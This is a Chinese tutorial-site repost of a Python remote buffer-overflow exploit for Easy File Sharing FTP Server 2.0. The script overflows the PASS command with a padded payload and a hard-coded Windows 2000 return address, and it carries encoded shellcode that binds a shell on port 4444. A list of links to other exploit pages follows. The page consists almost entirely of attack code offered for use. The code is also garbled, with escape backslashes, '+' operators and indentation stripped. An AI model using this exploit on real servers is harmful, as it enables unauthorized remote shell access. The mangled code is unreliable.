手机
当前位置:查字典教程网 >网络安全 >Exploit >Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
摘要:#!/usr/bin/python#RemoteexploitforEasyFileSharingFTPserverV2.0.Thevuln...

#!/usr/bin/python

# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability

# was discovered by h07 and a POC for windows XP SP2 (polish version) was

# provided. This exploit was tested on windows 2000 server SP4. The exploit

# binds a shell on TCP port 4444.

#

# Author shall bear no responsibility for any screw ups

# Winny Thomas :-)

import os

import sys

import time

import struct

import socket

shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"

shellcode = "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"

shellcode = "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"

shellcode = "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"

shellcode = "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"

shellcode = "x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48"

shellcode = "x4ex56x46x42x46x42x4bx48x45x34x4ex33x4bx38x4ex37"

shellcode = "x45x50x4ax57x41x30x4fx4ex4bx38x4fx54x4ax31x4bx38"

shellcode = "x4fx45x42x32x41x30x4bx4ex49x34x4bx38x46x33x4bx38"

shellcode = "x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"

shellcode = "x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"

shellcode = "x46x4fx4bx43x46x35x46x32x4ax52x45x47x45x4ex4bx58"

shellcode = "x4fx45x46x42x41x50x4bx4ex48x56x4bx58x4ex30x4bx34"

shellcode = "x4bx38x4fx45x4ex51x41x50x4bx4ex43x30x4ex42x4bx48"

shellcode = "x49x38x4ex46x46x52x4ex31x41x36x43x4cx41x43x4bx4d"

shellcode = "x46x36x4bx48x43x34x42x53x4bx48x42x44x4ex50x4bx58"

shellcode = "x42x47x4ex31x4dx4ax4bx48x42x54x4ax30x50x55x4ax56"

shellcode = "x50x38x50x44x50x30x4ex4ex42x55x4fx4fx48x4dx48x36"

shellcode = "x43x35x48x36x4ax36x43x43x44x43x4ax36x47x37x43x57"

shellcode = "x44x53x4fx35x46x45x4fx4fx42x4dx4ax46x4bx4cx4dx4e"

shellcode = "x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx45x49x48x45x4e"

shellcode = "x48x56x41x48x4dx4ex4ax30x44x30x45x55x4cx56x44x30"

shellcode = "x4fx4fx42x4dx4ax56x49x4dx49x50x45x4fx4dx4ax47x55"

shellcode = "x4fx4fx48x4dx43x45x43x45x43x45x43x35x43x35x43x44"

shellcode = "x43x55x43x44x43x35x4fx4fx42x4dx48x46x4ax56x41x31"

shellcode = "x4ex45x48x36x43x55x49x58x41x4ex45x39x4ax56x46x4a"

shellcode = "x4cx51x42x47x47x4cx47x45x4fx4fx48x4dx4cx46x42x31"

shellcode = "x41x35x45x55x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42"

shellcode = "x49x4ex47x45x4fx4fx48x4dx43x45x45x35x4fx4fx42x4d"

shellcode = "x4ax46x45x4ex49x44x48x58x49x54x47x45x4fx4fx48x4d"

shellcode = "x42x35x46x45x46x55x45x45x4fx4fx42x4dx43x59x4ax56"

shellcode = "x47x4ex49x37x48x4cx49x37x47x45x4fx4fx48x4dx45x55"

shellcode = "x4fx4fx42x4dx48x56x4cx46x46x46x48x46x4ax36x43x46"

shellcode = "x4dx46x49x58x45x4ex4cx46x42x35x49x35x49x32x4ex4c"

shellcode = "x49x38x47x4ex4cx36x46x34x49x38x44x4ex41x53x42x4c"

shellcode = "x43x4fx4cx4ax50x4fx44x44x4dx52x50x4fx44x44x4ex32"

shellcode = "x43x59x4dx38x4cx57x4ax33x4bx4ax4bx4ax4bx4ax4ax46"

shellcode = "x44x57x50x4fx43x4bx48x51x4fx4fx45x47x46x34x4fx4f"

shellcode = "x48x4dx4bx35x47x45x44x55x41x45x41x45x41x55x4cx36"

shellcode = "x41x30x41x35x41x45x45x45x41x45x4fx4fx42x4dx4ax46"

shellcode = "x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx46"

shellcode = "x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx48x47x55x4ex4f"

shellcode = "x43x58x46x4cx46x56x4fx4fx48x4dx44x45x4fx4fx42x4d"

shellcode = "x4ax56x4fx4ex50x4cx42x4ex42x36x43x55x4fx4fx48x4d"

shellcode = "x4fx4fx42x4dx5a"

def ConnectRemoteShell(target):

connect = "/usr/bin/telnet " target " 4444"

os.system(connect)

def ExploitFTP(target):

sockAddr = (target, 21)

tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

tsock.connect(sockAddr)

response = tsock.recv(1024)

print response

# At the time of overflow EBX points into our shellcode

payload = 'A' * 2553

# NOP's pad with a 15 byte jump over some junk and the RET address

# Jumps into our shellcode

payload = 'x90x90x90x90x90x90x90x90xebx0f'

# Address of 'call ebx' from kernel32.dll SP4

payload = struct.pack('<L', 0x7C577B03)

# Address of pop reg/pop reg/ret for XP SP2 from ws2_32.dll

# But this one is not very reliable like Win2K SP4

#payload = struct.pack('<L', 0x71AB1269)

payload = 'x90' * 83

payload = shellcode

user = 'USER anonymousrn'

tsock.send(user)

response = tsock.recv(1024)

print response

passwd = 'PASS x2c' payload 'rn'

tsock.send(passwd)

response = tsock.recv(1024)

print response

if __name__ == '__main__':

try:

target = sys.argv[1]

except IndexError:

print 'Usage: %s <target>' % sys.argv[0]

sys.exit(-1)

ExploitFTP(target)//http://www.leftworld.net

【Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit】相关文章:

DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Joomla Component EZ Store Remote Blind SQL Injection Exploit

The Personal FTP Server 6.0f RETR Denial of Service Exploit

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

Debian Sarge Multiple IMAP Server Denial of Service Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

精品推荐
分类导航